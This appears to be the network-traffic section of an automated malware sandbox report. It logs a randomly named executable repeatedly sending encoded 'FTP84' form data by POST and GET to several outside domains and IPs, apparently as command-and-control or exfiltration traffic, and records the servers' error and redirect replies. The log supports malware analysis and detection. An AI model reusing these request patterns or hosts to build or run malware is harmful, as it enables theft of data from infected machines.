                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                  Jul 1, 2024 19:26:15.038253069 CEST | 189 | IN
                                                  Data Ascii: ry not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  28 | 192.168.2.7 | 64483 | 43.198.80.127 | 80 | 6696 | C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jul 1, 2024 19:26:16.690655947 CEST | 1752 | OUT | POST /i6sl/ HTTP/1.1
                                                  Host: www.botokkkd4.top
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Accept-Encoding: gzip, deflate, br
                                                  Connection: close
                                                  Content-Length: 1250
                                                  Cache-Control: max-age=0
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.botokkkd4.top
                                                  Referer: http://www.botokkkd4.top/i6sl/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Jul 1, 2024 19:26:17.580858946 CEST  1236               IN         HTTP/1.1 404 Not Found
                                                  Content-Type: text/html
                                                  Server: Microsoft-IIS/10.0
                                                  X-Powered-By: ASP.NET
                                                  Date: Mon, 01 Jul 2024 17:26:17 GMT
                                                  Connection: close
                                                  Content-Length: 1245
                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                  Jul 1, 2024 19:26:17.580935955 CEST  189                IN
                                                  Data Ascii: ry not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                  29          192.168.2.7  64484        43.198.80.127   80                6696  C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  Timestamp                            Bytes transferred  Direction  Data
                                                  Jul 1, 2024 19:26:19.230746031 CEST  456                OUT        GET /i6sl/?Lb=GFtlIrHx8T50&FTP84=qssHGV29j0ZCAjpN6QtzDw+gnCiynPmFES/c0m6mTWJ8eKXYeJPjMTEVk7GvbqhDwPeBMRZatQ3ofr/5XjUfaZC8rCPfXyoknOgmUV1BLU/3HLT18Q+LgoHdoh8bcR/ofs2EqraVghMO HTTP/1.1
                                                  Host: www.botokkkd4.top
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Jul 1, 2024 19:26:20.122318983 CEST  1236               IN         HTTP/1.1 404 Not Found
                                                  Content-Type: text/html
                                                  Server: Microsoft-IIS/10.0
                                                  X-Powered-By: ASP.NET
                                                  Date: Mon, 01 Jul 2024 17:26:20 GMT
                                                  Connection: close
                                                  Content-Length: 1245
                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                  Jul 1, 2024 19:26:20.122387886 CEST  189                IN
                                                  Data Ascii: ry not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                  30          192.168.2.7  64485        45.130.41.249   80                6696  C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  Timestamp                            Bytes transferred  Direction  Data
                                                  Jul 1, 2024 19:26:25.502549887 CEST  713                OUT        POST /1cpo/ HTTP/1.1
                                                  Host: www.cvt-auto.ru
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Accept-Encoding: gzip, deflate, br
                                                  Connection: close
                                                  Content-Length: 218
                                                  Cache-Control: max-age=0
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.cvt-auto.ru
                                                  Referer: http://www.cvt-auto.ru/1cpo/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Data Ascii: FTP84=aUBGal1mXAvQ72GB9kjeUjGraesYfH1H/mj1fydH83XaGqXaYGyZBBkrvlODNIEwK3eKvPf9BFul0klANZhWQDm1n9hADTl4eAsqIndTl9IPqsKvkQ9LdGYhDrVSNHVmcye4ZiHO82IWNrtnG9YjbZYG5QlnUfK1+hH8gxRrpYNQTVg/GC/6QZ7m3R9A4heh+fLx50452J4KW5LUcw==
                                                  Jul 1, 2024 19:26:26.293921947 CEST  366                IN         HTTP/1.1 301 Moved Permanently
                                                  Server: nginx-reuseport/1.21.1
                                                  Date: Mon, 01 Jul 2024 17:26:26 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Content-Length: 0
                                                  Connection: close
                                                  X-Powered-By: PHP/8.3.8
                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                  X-Redirect-By: WordPress
                                                  Location: https://www.cvt-auto.ru/1cpo/


                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                  31          192.168.2.7  64486        45.130.41.249   80                6696  C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  Timestamp                            Bytes transferred  Direction  Data
                                                  Jul 1, 2024 19:26:28.041009903 CEST  733                OUT        POST /1cpo/ HTTP/1.1
                                                  Host: www.cvt-auto.ru
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Accept-Encoding: gzip, deflate, br
                                                  Connection: close
                                                  Content-Length: 238
                                                  Cache-Control: max-age=0
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.cvt-auto.ru
                                                  Referer: http://www.cvt-auto.ru/1cpo/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Data Ascii: FTP84=aUBGal1mXAvQpC6BwnbeFzGofesYVn1D/mv1fzYC8lzaGLnaJ3yZSxkrhFOaCoErK2j/vNL9BBGl0lVAY6JRKzm3+NhGNzl4eAsqIn42l9QPqc6viyZIQmYuTLVScXVicyeWZgzk8y4WNvpnFpEgCpYAmAkySvDx7Cj8hCFex69DSj9dcgzWOIDdzTZ2vHDU8ePp0WMYp+dgbrqQKCRWBs9c6/aQ6imkyAABZoA=
                                                  Jul 1, 2024 19:26:28.835242987 CEST  366                IN         HTTP/1.1 301 Moved Permanently
                                                  Server: nginx-reuseport/1.21.1
                                                  Date: Mon, 01 Jul 2024 17:26:28 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Content-Length: 0
                                                  Connection: close
                                                  X-Powered-By: PHP/8.3.8
                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                  X-Redirect-By: WordPress
                                                  Location: https://www.cvt-auto.ru/1cpo/


                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                  32          192.168.2.7  64487        45.130.41.249   80                6696  C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  Timestamp                            Bytes transferred  Direction  Data
                                                  Jul 1, 2024 19:26:30.574495077 CEST  1746               OUT        POST /1cpo/ HTTP/1.1
                                                  Host: www.cvt-auto.ru
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Accept-Encoding: gzip, deflate, br
                                                  Connection: close
                                                  Content-Length: 1250
                                                  Cache-Control: max-age=0
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.cvt-auto.ru
                                                  Referer: http://www.cvt-auto.ru/1cpo/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Data Ascii: FTP84= [TRUNCATED]
                                                  Jul 1, 2024 19:26:31.389900923 CEST  366                IN         HTTP/1.1 301 Moved Permanently
                                                  Server: nginx-reuseport/1.21.1
                                                  Date: Mon, 01 Jul 2024 17:26:31 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Content-Length: 0
                                                  Connection: close
                                                  X-Powered-By: PHP/8.3.8
                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                  X-Redirect-By: WordPress
                                                  Location: https://www.cvt-auto.ru/1cpo/


                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                  33          192.168.2.7  64488        45.130.41.249   80                6696  C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  Timestamp                            Bytes transferred  Direction  Data
                                                  Jul 1, 2024 19:26:33.240206957 CEST  454                OUT        GET /1cpo/?FTP84=XWpmZSZkQQ3crjSg4jO9FnvqfvQgDjUUlmKrUzlk+2X+Pq/xYmmvIQcMng+aGKp/N3zIo6PNXS6jtUQwBpM9XRiN/OVETSVEN1Q9JXY1u8NKleTflw9Of0xlNOdKZA91JkeaJQbbmRkx&Lb=GFtlIrHx8T50 HTTP/1.1
                                                  Host: www.cvt-auto.ru
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Jul 1, 2024 19:26:34.063911915 CEST  529                IN         HTTP/1.1 301 Moved Permanently
                                                  Server: nginx-reuseport/1.21.1
                                                  Date: Mon, 01 Jul 2024 17:26:33 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Content-Length: 0
                                                  Connection: close
                                                  X-Powered-By: PHP/8.3.8
                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                  X-Redirect-By: WordPress
                                                  Location: https://www.cvt-auto.ru/1cpo/?FTP84=XWpmZSZkQQ3crjSg4jO9FnvqfvQgDjUUlmKrUzlk+2X+Pq/xYmmvIQcMng+aGKp/N3zIo6PNXS6jtUQwBpM9XRiN/OVETSVEN1Q9JXY1u8NKleTflw9Of0xlNOdKZA91JkeaJQbbmRkx&Lb=GFtlIrHx8T50


                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                  34          192.168.2.7  64489        91.195.240.123  80                6696  C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  Timestamp                            Bytes transferred  Direction  Data
                                                  Jul 1, 2024 19:26:39.195626974 CEST  725                OUT        POST /blq3/ HTTP/1.1
                                                  Host: www.ridcoredry.live
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Accept-Encoding: gzip, deflate, br
                                                  Connection: close
                                                  Content-Length: 218
                                                  Cache-Control: max-age=0
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.ridcoredry.live
                                                  Referer: http://www.ridcoredry.live/blq3/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Data Ascii: FTP84=ySoglBSslfBplS/bzwWN1d0l8A86gb/SdPvP9fbaIRyS1n1ZzSB2ypzX4Sos5DdU6bhXmPb1zOu239+WJIiv7EtBMry40byXQ9AL+vEPqX/GNVZwUR/sVb+pC71AT681bQ4fapz566d3yHYkVginySVAN3GRkKirhYaO4J3a/DB1Q7gg8xuOrHInj1fk0tgyl/j7T3v9Jomua4HrsA==
                                                  Jul 1, 2024 19:26:39.897694111 CEST  305                IN         HTTP/1.1 405 Not Allowed
                                                  date: Mon, 01 Jul 2024 17:26:39 GMT
                                                  content-type: text/html
                                                  content-length: 154
                                                  server: Parking/1.0
                                                  connection: close
                                                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                  35          192.168.2.7  64490        91.195.240.123  80                6696  C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  Timestamp                            Bytes transferred  Direction  Data
                                                  Jul 1, 2024 19:26:41.755805016 CEST  745                OUT        POST /blq3/ HTTP/1.1
                                                  Host: www.ridcoredry.live
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Accept-Encoding: gzip, deflate, br
                                                  Connection: close
                                                  Content-Length: 238
                                                  Cache-Control: max-age=0
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.ridcoredry.live
                                                  Referer: http://www.ridcoredry.live/blq3/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Data Ascii: FTP84=ySoglBSslfBplzPbyS+N090i5A865r+ZdPjP9a7KIDWS0GFZ9w52xpzXsioT0jdf6bsimKz1zOq234aWJb6o40tDX7y63ryXQ9AL+v41qTTGNlJwbUfvWb+mKb1AF68pbQ45aouu68Z3yGokVxik7SUFQHHvsYr/h8eI2JuOnjloct9CmTii1Wwcn37SjL9Hn+njeVbcWfDEXqmv6xmN25rIT/nCynLtwKvU4YU=
                                                  Jul 1, 2024 19:26:42.421699047 CEST  305                IN         HTTP/1.1 405 Not Allowed
                                                  date: Mon, 01 Jul 2024 17:26:42 GMT
                                                  content-type: text/html
                                                  content-length: 154
                                                  server: Parking/1.0
                                                  connection: close
                                                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                  36          192.168.2.7  64491        91.195.240.123  80                6696  C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  Timestamp                            Bytes transferred  Direction  Data
                                                  Jul 1, 2024 19:26:44.289427996 CEST  1758               OUT        POST /blq3/ HTTP/1.1
                                                  Host: www.ridcoredry.live
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Accept-Encoding: gzip, deflate, br
                                                  Connection: close
                                                  Content-Length: 1250
                                                  Cache-Control: max-age=0
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.ridcoredry.live
                                                  Referer: http://www.ridcoredry.live/blq3/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Data Ascii: FTP84= [TRUNCATED]


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  37 | 192.168.2.7 | 64492 | 91.195.240.123 | 80 | 6696 | C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jul 1, 2024 19:26:46.825320959 CEST | 458 | OUT | GET /blq3/?Lb=GFtlIrHx8T50&FTP84=/QAAm0GouadCsSjm0XCQ0NNd9BYFgPCeNdHOqYXBISGV1GFo4SB1zqqUvhYZ4jEo/5lijPf3qt+9x6u7W4DslmBYMZTBtvuPQphb+44RgWDcLgkceETeTezSGqdjX9slNk8GIp6396hv HTTP/1.1
                                                  Host: www.ridcoredry.live
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Jul 1, 2024 19:26:47.501921892 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                  date: Mon, 01 Jul 2024 17:26:47 GMT
                                                  content-type: text/html; charset=UTF-8
                                                  transfer-encoding: chunked
                                                  vary: Accept-Encoding
                                                  expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                  cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                  pragma: no-cache
                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_eo9OeiVz3GCxtPE6HZiRFFsltj5hMmzizKgZ49sO3Vh1F2ySG9mtuAn3+h1qcljkLT+fbFjDqpdrGmMO190vYg==
                                                  last-modified: Mon, 01 Jul 2024 17:26:47 GMT
                                                  x-cache-miss-from: parking-89c5695ff-ppcpm
                                                  server: Parking/1.0
                                                  connection: close
                                                  Data Ascii: 2E3<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_eo9OeiVz3GCxtPE6HZiRFFsltj5hMmzizKgZ49sO3Vh1F2ySG9mtuAn3+h1qcljkLT+fbFjDqpdrGmMO190vYg==><head><meta charset="utf-8"><title>ridcoredry.live&nbsp;-&nbsp;ridcoredry Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="ridcoredry.live is your first and best source for all of the information


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  38 | 192.168.2.7 | 64493 | 38.207.19.49 | 80 | 6696 | C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jul 1, 2024 19:26:52.979090929 CEST | 719 | OUT | POST /vgf2/ HTTP/1.1
                                                  Host: www.filmbrute.com
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Accept-Encoding: gzip, deflate, br
                                                  Connection: close
                                                  Content-Length: 218
                                                  Cache-Control: max-age=0
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.filmbrute.com
                                                  Referer: http://www.filmbrute.com/vgf2/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Data Ascii: FTP84=I27OYu/Ci+rdA3Lss6yiPq3vtj6kbfEwbNoI+TbTpiL6pYbojaAP7JT29rb4suoMmjOAKQiqXlyENkCQvatNqeu0m7KvvdV/qjysn/CWqzZUCoVQ1g1Cpy8J9l0m8ZbkWgSQjQSU4rFQ+pdwyMdfQB22wIDIhiEM+X/BJ/LbVF5lmBsoCnAc3VIR85GrfDKprC7BIn5xEx/MDaFFjA==
                                                  Jul 1, 2024 19:26:54.169118881 CEST | 589 | IN | HTTP/1.1 400 Bad Request
                                                  Date: Mon, 01 Jul 2024 17:26:53 GMT
                                                  Server: Apache
                                                  Upgrade: h2
                                                  Connection: Upgrade, close
                                                  Vary: Accept-Encoding
                                                  Content-Encoding: gzip
                                                  Content-Length: 359
                                                  Content-Type: text/html; charset=utf-8


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  39 | 192.168.2.7 | 64494 | 38.207.19.49 | 80 | 6696 | C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jul 1, 2024 19:26:55.629261017 CEST | 739 | OUT | POST /vgf2/ HTTP/1.1
                                                  Host: www.filmbrute.com
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Accept-Encoding: gzip, deflate, br
                                                  Connection: close
                                                  Content-Length: 238
                                                  Cache-Control: max-age=0
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.filmbrute.com
                                                  Referer: http://www.filmbrute.com/vgf2/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Data Ascii: FTP84=I27OYu/Ci+rdaXXsqYaiea3gzz6kS/E8bNkI+WjD8Eb6o5rogbAP6JT22LaziOobmjC5KVaqXkWENlyQvtxKqOu2qbKhg9V/qjysn/mwqzBUBYFQzFVByS8K3F0m25bgWgTFjVy+4pNQ+tZwyZpeFR2w9oDeuycGwn3RNtWFdkFBuXxKYFMwpEwq47idIlXcpD/ZFFNQbGamOIkB170xcf1QOn7C+/HIvPua0qE=
                                                  Jul 1, 2024 19:26:56.877687931 CEST | 589 | IN | HTTP/1.1 400 Bad Request
                                                  Date: Mon, 01 Jul 2024 17:26:56 GMT
                                                  Server: Apache
                                                  Upgrade: h2
                                                  Connection: Upgrade, close
                                                  Vary: Accept-Encoding
                                                  Content-Encoding: gzip
                                                  Content-Length: 359
                                                  Content-Type: text/html; charset=utf-8


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  40 | 192.168.2.7 | 64495 | 38.207.19.49 | 80 | 6696 | C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jul 1, 2024 19:26:58.166465044 CEST | 1752 | OUT | POST /vgf2/ HTTP/1.1
                                                  Host: www.filmbrute.com
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Accept-Encoding: gzip, deflate, br
                                                  Connection: close
                                                  Content-Length: 1250
                                                  Cache-Control: max-age=0
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.filmbrute.com
                                                  Referer: http://www.filmbrute.com/vgf2/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Data Ascii: FTP84= [TRUNCATED]
                                                  Jul 1, 2024 19:26:59.308974981 CEST | 589 | IN | HTTP/1.1 400 Bad Request
                                                  Date: Mon, 01 Jul 2024 17:26:58 GMT
                                                  Server: Apache
                                                  Upgrade: h2
                                                  Connection: Upgrade, close
                                                  Vary: Accept-Encoding
                                                  Content-Encoding: gzip
                                                  Content-Length: 359
                                                  Content-Type: text/html; charset=utf-8


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  41 | 192.168.2.7 | 64496 | 38.207.19.49 | 80 | 6696 | C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jul 1, 2024 19:27:00.696486950 CEST | 456 | OUT | GET /vgf2/?FTP84=F0TubYbkra/fLGHNqtnaeYyDjBSRDaIxGedz+B7Iv0bejpDurJsW0bbpyLvpmMVlmiWzO1GtHUuGPki2goMxppGKi6uI7uQ9xVSgz+G1kxpEA95r9Q5H+Hhz7gAx2pLrWkb0si+rio1X&Lb=GFtlIrHx8T50 HTTP/1.1
                                                  Host: www.filmbrute.com
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Jul 1, 2024 19:27:01.953816891 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                  Date: Mon, 01 Jul 2024 17:27:01 GMT
                                                  Server: Apache
                                                  Upgrade: h2
                                                  Connection: Upgrade, close
                                                  Vary: Accept-Encoding
                                                  Transfer-Encoding: chunked
                                                  Content-Type: text/html; charset=utf-8
                                                  Data Ascii: 2000<html dir="ltr" lang="zh"> <head> <meta charset="utf-8"> <meta name="color-scheme" content="light dark"> <meta name="theme-color" content="#fff"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <title></title> <style>/* Copyright 2017 The Chromium Authors. All rights reserved. * Use of this source code is governed by a BSD-style license that can be * found in the LICENSE file. */ a { color: var(--link-color); } body { --background-color: #fff; --error-code-color: var(--google-gray-700); --google-blue-100: rgb(210, 227, 252); --google-blue-300: rgb(138, 180, 248); --google-blue-600: rgb(26, 115, 232); --google-blue-700: rgb(25, 103, 210); --google-gray-100: rgb(241, 243, 244); --google-gray-300: rgb(218, 220, 224); --google-gray-500: rgb(154, 160, 166); --google-gray-50: rgb(248, 249, 250); --google-gray-600: rgb(128, 134, 139); --google-gray-700: rgb(95, 99, 1 [TRUNCATED]
